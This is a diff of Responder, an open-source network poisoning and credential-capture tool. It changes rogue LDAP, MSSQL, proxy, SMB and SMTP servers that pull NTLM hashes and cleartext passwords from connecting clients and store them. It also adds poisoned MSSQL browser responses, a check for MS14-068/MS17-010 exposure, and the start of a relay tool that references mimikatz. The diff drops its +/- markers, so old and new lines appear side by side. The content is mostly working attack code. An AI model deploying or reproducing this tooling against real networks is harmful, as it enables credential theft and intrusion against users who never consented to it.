LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if LMhashLen > 10:
LMhashOffset = struct.unpack('<H',data[58:60])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[64:66])[0]
NthashOffset = struct.unpack('<H',data[66:68])[0]
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[72:74])[0]
DomainOffset = struct.unpack('<H',data[74:76])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[80:82])[0]
UserOffset = struct.unpack('<H',data[82:84])[0]
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = User + "::" + Domain + ":" + LMHash + ":" + NtHash + ":" + settings.Config.NumChal
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, Challenge.encode('hex'))
SaveToDb({
'module': 'LDAP',
'type': 'NTLMv1',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+User,
'hash': NtHash,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'LDAP',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if LMhashLen < 2 and settings.Config.Verbose:
print text("[LDAP] Ignoring anonymous NTLM authentication")
def ParseNTLM(data,client):
def ParseNTLM(data,client, Challenge):
if re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data):
NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9],NTLMSSPNtServerChallenge=settings.Config.Challenge)
NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9],NTLMSSPNtServerChallenge=Challenge)
NTLMChall.calculate()
return str(NTLMChall)
elif re.search('(NTLMSSP\x00\x03\x00\x00\x00)', data):
ParseLDAPHash(data,client)
ParseLDAPHash(data, client, Challenge)
def ParseLDAPPacket(data, client):
def ParseLDAPPacket(data, client, Challenge):
if data[1:2] == '\x84':
PacketLen = struct.unpack('>i',data[2:6])[0]
MessageSequence = struct.unpack('<b',data[8:9])[0]
@@ -96,24 +112,43 @@ def ParseLDAPPacket(data, client):
})
if sasl == "\xA3":
Buffer = ParseNTLM(data,client)
Buffer = ParseNTLM(data,client, Challenge)
return Buffer
elif Operation == "\x63":
Buffer = ParseSearch(data)
return Buffer
elif settings.Config.Verbose:
print text('[LDAP] Operation not supported')
if data[5:6] == '\x60':
UserLen = struct.unpack("<b",data[11:12])[0]
UserString = data[12:12+UserLen]
PassLen = struct.unpack("<b",data[12+UserLen+1:12+UserLen+2])[0]
PassStr = data[12+UserLen+2:12+UserLen+3+PassLen]
if settings.Config.Verbose:
print text('[LDAP] Attempting to parse an old simple Bind request.')
SaveToDb({
'module': 'LDAP',
'type': 'Cleartext',
'client': client,
'user': UserString,
'cleartext': PassStr,
'fullhash': UserString+':'+PassStr,
})
class LDAP(BaseRequestHandler):
def handle(self):
try:
while True:
self.request.settimeout(0.5)
data = self.request.recv(8092)
Buffer = ParseLDAPPacket(data,self.client_address[0])
self.request.settimeout(0.4)
data = self.request.recv(8092)
Challenge = RandomChallenge()
for x in range(5):
Buffer = ParseLDAPPacket(data,self.client_address[0], Challenge)
if Buffer:
self.request.send(Buffer)
except socket.timeout:
pass
data = self.request.recv(8092)
except:
pass

73
servers/MSSQL.py
View File

@@ -17,6 +17,7 @@
from SocketServer import BaseRequestHandler
from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
from utils import *
import random
import struct
class TDS_Login_Packet:
@@ -52,7 +53,7 @@ class TDS_Login_Packet:
self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
def ParseSQLHash(data, client):
def ParseSQLHash(data, client, Challenge):
SSPIStart = data[8:]
LMhashLen = struct.unpack('<H',data[20:22])[0]
@@ -72,7 +73,7 @@ def ParseSQLHash(data, client):
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, settings.Config.NumChal)
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, Challenge.encode('hex'))
SaveToDb({
'module': 'MSSQL',
@@ -84,7 +85,7 @@ def ParseSQLHash(data, client):
})
if NthashLen > 60:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, Challenge.encode('hex'), NTHash[:32], NTHash[32:])
SaveToDb({
'module': 'MSSQL',
@@ -119,33 +120,59 @@ def ParseClearTextSQLPass(data, client):
# MSSQL Server class
class MSSQL(BaseRequestHandler):
def handle(self):
if settings.Config.Verbose:
print text("[MSSQL] Received connection from %s" % self.client_address[0])
try:
while True:
data = self.request.recv(1024)
if settings.Config.Verbose:
print text("[MSSQL] Received connection from %s" % self.client_address[0])
if data[0] == "\x12": # Pre-Login Message
Buffer = str(MSSQLPreLoginAnswer())
self.request.send(Buffer)
data = self.request.recv(1024)
self.request.settimeout(0.1)
if data[0] == "\x12": # Pre-Login Message
Buffer = str(MSSQLPreLoginAnswer())
if data[0] == "\x10": # NegoSSP
if re.search("NTLMSSP",data):
Challenge = RandomChallenge()
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge)
Packet.calculate()
Buffer = str(Packet)
self.request.send(Buffer)
data = self.request.recv(1024)
else:
ParseClearTextSQLPass(data,self.client_address[0])
if data[0] == "\x10": # NegoSSP
if re.search("NTLMSSP",data):
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=settings.Config.Challenge)
Packet.calculate()
Buffer = str(Packet)
self.request.send(Buffer)
data = self.request.recv(1024)
else:
ParseClearTextSQLPass(data,self.client_address[0])
if data[0] == "\x11": # NegoSSP Auth
ParseSQLHash(data,self.client_address[0])
if data[0] == "\x11": # NegoSSP Auth
ParseSQLHash(data,self.client_address[0],Challenge)
except:
self.request.close()
pass
# MSSQL Server Browser class
# See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx
class MSSQLBrowser(BaseRequestHandler):
def handle(self):
if settings.Config.Verbose:
print text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0])
data, soc = self.request
if data:
if data[0] in "\x02\x03": # CLNT_BCAST_EX / CLNT_UCAST_EX
self.send_response(soc, "MSSQLSERVER")
elif data[0] == "\x04": # CLNT_UCAST_INST
self.send_response(soc, data[1:].rstrip("\x00"))
elif data[0] == "\x0F": # CLNT_UCAST_DAC
self.send_dac_response(soc)
def send_response(self, soc, inst):
print text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0])
server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20)))
resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst)
soc.sendto(struct.pack("<BH", 0x05, len(resp)) + resp, self.client_address)
def send_dac_response(self, soc):
print text("[MSSQL-BROWSER] Sending poisoned DAC response to %s" % self.client_address[0])
soc.sendto(struct.pack("<BHBH", 0x05, 0x06, 0x01, 1433), self.client_address)

9
servers/Proxy_Auth.py
View File

@@ -47,7 +47,7 @@ def GrabHost(data):
return Host
return False
def PacketSequence(data, client):
def PacketSequence(data, client, Challenge):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
if NTLM_Auth:
@@ -56,14 +56,14 @@ def PacketSequence(data, client):
if settings.Config.Verbose:
print text("[Proxy-Auth] Sending NTLM authentication request to %s" % client)
Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
Buffer = NTLM_Challenge(ServerChallenge=Challenge)
Buffer.calculate()
Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(Buffer))
return str(Buffer_Ans)
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Auth))
ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth")
ParseHTTPHash(NTLM_Auth, Challenge, client, "Proxy-Auth")
GrabUserAgent(data)
GrabCookie(data)
GrabHost(data)
@@ -101,9 +101,10 @@ class Proxy_Auth(SocketServer.BaseRequestHandler):
def handle(self):
try:
Challenge = RandomChallenge()
for x in range(2):
data = self.request.recv(4096)
self.request.send(PacketSequence(data, self.client_address[0]))
self.request.send(PacketSequence(data, self.client_address[0], Challenge))
except:
pass

88
servers/SMB.py
View File

@@ -88,34 +88,24 @@ def GrabSessionID(data):
SessionID = data[44:52]
return SessionID
def ParseSMBHash(data,client): #Parse SMB NTLMSSP v1/v2
SecBlobLen = struct.unpack('<H',data[51:53])[0]
BccLen = struct.unpack('<H',data[61:63])[0]
if SecBlobLen < 260:
SSPIStart = data[75:]
LMhashLen = struct.unpack('<H',data[89:91])[0]
LMhashOffset = struct.unpack('<H',data[91:93])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[97:99])[0]
NthashOffset = struct.unpack('<H',data[99:101])[0]
else:
SSPIStart = data[79:]
LMhashLen = struct.unpack('<H',data[93:95])[0]
LMhashOffset = struct.unpack('<H',data[95:97])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[101:103])[0]
NthashOffset = struct.unpack('<H',data[103:105])[0]
def ParseSMBHash(data,client, Challenge): #Parse SMB NTLMSSP v1/v2
SSPIStart = data.find('NTLMSSP')
SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if NthashLen == 24:
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[105:107])[0]
DomainOffset = struct.unpack('<H',data[107:109])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',data[113:115])[0]
UserOffset = struct.unpack('<H',data[115:117])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, settings.Config.NumChal)
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, Challenge.encode('hex'))
SaveToDb({
'module': 'SMB',
@@ -127,14 +117,14 @@ def ParseSMBHash(data,client): #Parse SMB NTLMSSP v1/v2
})
if NthashLen > 60:
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[109:111])[0]
DomainOffset = struct.unpack('<H',data[111:113])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',data[117:119])[0]
UserOffset = struct.unpack('<H',data[119:121])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'SMB',
@@ -146,7 +136,7 @@ def ParseSMBHash(data,client): #Parse SMB NTLMSSP v1/v2
})
def ParseSMB2NTLMv2Hash(data,client): #Parse SMB NTLMv2
def ParseSMB2NTLMv2Hash(data,client, Challenge): #Parse SMB NTLMv2
SSPIStart = data[113:]
data = data[113:]
LMhashLen = struct.unpack('<H',data[12:14])[0]
@@ -161,7 +151,7 @@ def ParseSMB2NTLMv2Hash(data,client): #Parse SMB NTLMv2
UserLen = struct.unpack('<H',data[38:40])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'SMBv2',
'type': 'NTLMv2-SSP',
@@ -171,7 +161,7 @@ def ParseSMB2NTLMv2Hash(data,client): #Parse SMB NTLMv2
'fullhash': WriteHash,
})
def ParseLMNTHash(data, client): # Parse SMB NTLMv1/v2
def ParseLMNTHash(data, client, Challenge): # Parse SMB NTLMv1/v2
LMhashLen = struct.unpack('<H',data[51:53])[0]
NthashLen = struct.unpack('<H',data[53:55])[0]
Bcc = struct.unpack('<H',data[63:65])[0]
@@ -181,7 +171,7 @@ def ParseLMNTHash(data, client): # Parse SMB NTLMv1/v2
FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
LmHash = FullHash[:32].upper()
NtHash = FullHash[32:].upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, LmHash, NtHash)
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), LmHash, NtHash)
SaveToDb({
'module': 'SMB',
@@ -195,7 +185,7 @@ def ParseLMNTHash(data, client): # Parse SMB NTLMv1/v2
if NthashLen == 24:
NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
LmHash = data[65:65+LMhashLen].encode('hex').upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, settings.Config.NumChal)
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, Challenge.encode('hex'))
SaveToDb({
'module': 'SMB',
@@ -231,6 +221,7 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
Challenge = RandomChallenge()
if not data:
break
@@ -243,7 +234,6 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
except:
pass
##Negotiate proto answer SMBv2.
if data[8:10] == "\x72\x00" and re.search("SMB 2.\?\?\?", data):
head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
@@ -265,7 +255,7 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
## Session Setup 2 answer SMBv2.
if data[16:18] == "\x01\x00" and data[4:5] == "\xfe":
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID=GrabSessionID(data),NTStatus="\x16\x00\x00\xc0")
t = SMB2Session1Data()
t = SMB2Session1Data(NTLMSSPNtServerChallenge=Challenge)
t.calculate()
packet1 = str(head)+str(t)
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
@@ -273,7 +263,7 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
data = self.request.recv(1024)
## Session Setup 3 answer SMBv2.
if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02" and data[4:5] == "\xfe":
ParseSMB2NTLMv2Hash(data, self.client_address[0])
ParseSMB2NTLMv2Hash(data, self.client_address[0], Challenge)
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data))
t = SMB2Session2Data()
packet1 = str(head)+str(t)
@@ -299,9 +289,9 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
Body = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
else:
Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
Body = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge)
Body.calculate()
Packet = str(Header)+str(Body)
@@ -323,7 +313,7 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data,self.client_address[0])
ParseSMBHash(data,self.client_address[0], Challenge)
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
# Send ACCOUNT_DISABLED to get multiple hashes if there are any
@@ -402,7 +392,7 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
self.request.send(Buffer)
data = self.request.recv(1024)
except socket.error:
except:
pass
@@ -411,7 +401,7 @@ class SMB1LM(BaseRequestHandler): # SMB Server class, old version
try:
self.request.settimeout(0.5)
data = self.request.recv(1024)
Challenge = RandomChallenge()
if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
self.request.send(Buffer)
@@ -419,7 +409,7 @@ class SMB1LM(BaseRequestHandler): # SMB Server class, old version
if data[8:10] == "\x72\x00": #Negotiate proto answer.
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=Challenge)
Body.calculate()
Packet = str(head)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
@@ -433,7 +423,7 @@ class SMB1LM(BaseRequestHandler): # SMB Server class, old version
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
ParseLMNTHash(data,self.client_address[0])
ParseLMNTHash(data,self.client_address[0], Challenge)
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head) + str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet

55
servers/SMTP.py
View File

@@ -26,28 +26,16 @@ class ESMTP(BaseRequestHandler):
self.request.send(str(SMTPGreeting()))
data = self.request.recv(1024)
if data[0:4] == "EHLO":
if data[0:4] == "EHLO" or data[0:4] == "ehlo":
self.request.send(str(SMTPAUTH()))
data = self.request.recv(1024)
if data[0:4] == "AUTH":
self.request.send(str(SMTPAUTH1()))
data = self.request.recv(1024)
if data:
try:
User = filter(None, b64decode(data).split('\x00'))
Username = User[0]
Password = User[1]
except:
Username = b64decode(data)
self.request.send(str(SMTPAUTH2()))
data = self.request.recv(1024)
if data:
try: Password = b64decode(data)
except: Password = data
AuthPlain = re.findall(r'(?<=AUTH PLAIN )[^\r]*', data)
if AuthPlain:
User = filter(None, b64decode(AuthPlain[0]).split('\x00'))
Username = User[0]
Password = User[1]
SaveToDb({
'module': 'SMTP',
@@ -56,7 +44,36 @@ class ESMTP(BaseRequestHandler):
'user': Username,
'cleartext': Password,
'fullhash': Username+":"+Password,
})
})
else:
self.request.send(str(SMTPAUTH1()))
data = self.request.recv(1024)
if data:
try:
User = filter(None, b64decode(data).split('\x00'))
Username = User[0]
Password = User[1]
except:
Username = b64decode(data)
self.request.send(str(SMTPAUTH2()))
data = self.request.recv(1024)
if data:
try: Password = b64decode(data)
except: Password = data
SaveToDb({
'module': 'SMTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Username,
'cleartext': Password,
'fullhash': Username+":"+Password,
})
except Exception:
raise
pass

66
settings.py
View File

@@ -20,7 +20,7 @@ import subprocess
from utils import *
__version__ = 'Responder 2.3.2.7'
__version__ = 'Responder 2.3.3.6'
class Settings:
@@ -69,6 +69,10 @@ class Settings:
print utils.color("Error: -I <if> mandatory option is missing", 1)
sys.exit(-1)
if options.Interface == "ALL" and options.OURIP == None:
print utils.color("Error: -i is missing.\nWhen using -I ALL you need to provide your current ip address", 1)
sys.exit(-1)
# Config parsing
config = ConfigParser.ConfigParser()
config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
@@ -175,20 +179,35 @@ class Settings:
if self.HtmlToInject is None:
self.HtmlToInject = ''
self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
self.IP_aton = socket.inet_aton(self.Bind_To)
self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
if self.Interface == "ALL":
self.Bind_To_ALL = True
else:
self.Bind_To_ALL = False
if self.Interface == "ALL":
self.IP_aton = socket.inet_aton(self.OURIP)
else:
self.IP_aton = socket.inet_aton(self.Bind_To)
self.Os_version = sys.platform
# Set up Challenge
self.NumChal = config.get('Responder Core', 'Challenge')
if self.NumChal.lower() == 'random':
self.NumChal = "random"
if len(self.NumChal) is not 16:
if len(self.NumChal) is not 16 and not "random":
print utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1)
sys.exit(-1)
self.Challenge = ""
for i in range(0, len(self.NumChal),2):
self.Challenge += self.NumChal[i:i+2].decode("hex")
if self.NumChal.lower() == 'random':
pass
else:
for i in range(0, len(self.NumChal),2):
self.Challenge += self.NumChal[i:i+2].decode("hex")
# Set up logging
logging.basicConfig(filename=self.SessionLogFile, level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
@@ -208,12 +227,35 @@ class Settings:
self.AnalyzeLogger = logging.getLogger('Analyze Log')
self.AnalyzeLogger.addHandler(ALog_Handler)
NetworkCard = subprocess.check_output(["ifconfig", "-a"])
DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
RoutingInfo = subprocess.check_output(["netstat", "-rn"])
Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo)
utils.DumpConfig(self.ResponderConfigDump, Message)
utils.DumpConfig(self.ResponderConfigDump,str(self))
try:
NetworkCard = subprocess.check_output(["ifconfig", "-a"])
except:
try:
NetworkCard = subprocess.check_output(["ip", "address", "show"])
except subprocess.CalledProcessError as ex:
NetworkCard = "Error fetching Network Interfaces:", ex
pass
try:
DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
except subprocess.CalledProcessError as ex:
DNS = "Error fetching DNS configuration:", ex
pass
try:
RoutingInfo = subprocess.check_output(["netstat", "-rn"])
except:
try:
RoutingInfo = subprocess.check_output(["ip", "route", "show"])
except subprocess.CalledProcessError as ex:
RoutingInfo = "Error fetching Routing information:", ex
pass
Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo)
try:
utils.DumpConfig(self.ResponderConfigDump, Message)
utils.DumpConfig(self.ResponderConfigDump,str(self))
except AttributeError as ex:
print "Missing Module:", ex
pass
def init():
global Config

0
tools/BrowserListener.py Normal file → Executable file
View File

2
tools/DHCP.py
View File

@@ -74,7 +74,7 @@ config.read(os.path.join(BASEDIR,'Responder.conf'))
RespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
DontRespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
Interface = options.Interface
Responder_IP = FindLocalIP(Interface)
Responder_IP = FindLocalIP(Interface, None)
ROUTERIP = options.RouterIP
NETMASK = options.Netmask
DHCPSERVER = Responder_IP

0
tools/DHCP_Auto.sh Normal file → Executable file
View File

16
tools/FindSMB2UPTime.py
View File

@@ -21,7 +21,7 @@ import struct
import socket
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..')))
from packets import SMB2Header, SMB2Nego, SMB2NegoData
from packets import SMBHeaderReq, SMB2NegoReq, SMB2NegoDataReq
def GetBootTime(data):
Filetime = int(struct.unpack('<q',data)[0])
@@ -33,8 +33,12 @@ def GetBootTime(data):
def IsDCVuln(t):
Date = datetime.datetime(2014, 11, 17, 0, 30)
if t[0] < Date:
print "DC is up since:", t[1]
print "This DC is vulnerable to MS14-068"
print "System is up since:", t[1]
print "This system may be vulnerable to MS14-068"
Date = datetime.datetime(2017, 03, 14, 0, 30)
if t[0] < Date:
print "System is up since:", t[1]
print "This system may be vulnerable to MS17-010"
print "DC is up since:", t[1]
@@ -43,8 +47,8 @@ def run(host):
s.connect(host)
s.settimeout(5)
Header = SMB2Header(Cmd="\x72",Flag1="\x18",Flag2="\x53\xc8")
Nego = SMB2Nego(Data = SMB2NegoData())
Header = SMBHeaderReq(Cmd="\x72",Flag1="\x18",Flag2="\x53\xc8")
Nego = SMB2NegoReq(Data = SMB2NegoDataReq())
Nego.calculate()
Packet = str(Header)+str(Nego)
@@ -63,6 +67,6 @@ def run(host):
if __name__ == "__main__":
if len(sys.argv)<=1:
sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address')
sys.exit('Usage: python '+sys.argv[0]+' System-IP-address')
host = sys.argv[1],445
run(host)

818
tools/MultiRelay.py Executable file
View File

@@ -0,0 +1,818 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import re
import os
import logging
import optparse
import time
import random
import subprocess
from threading import Thread
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
try:
from Crypto.Hash import MD5
except ImportError:
print "\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes."
print "You can install it on debian based os with this command: apt-get install python-crypto"
print "The Sam file will be saved anyway and you will have the bootkey.\033[0m\n"
try:
import readline
except:
print "Warning: readline module is not available, you will not be able to use the arrow keys for command history"
pass
from MultiRelay.RelayMultiPackets import *
from MultiRelay.RelayMultiCore import *
from SMBFinger.Finger import RunFinger,ShowSigning,RunPivotScan
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))
from socket import *
__version__ = "2.0"
MimikatzFilename = "./MultiRelay/bin/mimikatz.exe"
Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"
RunAsFileName = "./MultiRelay/bin/Runas.exe"
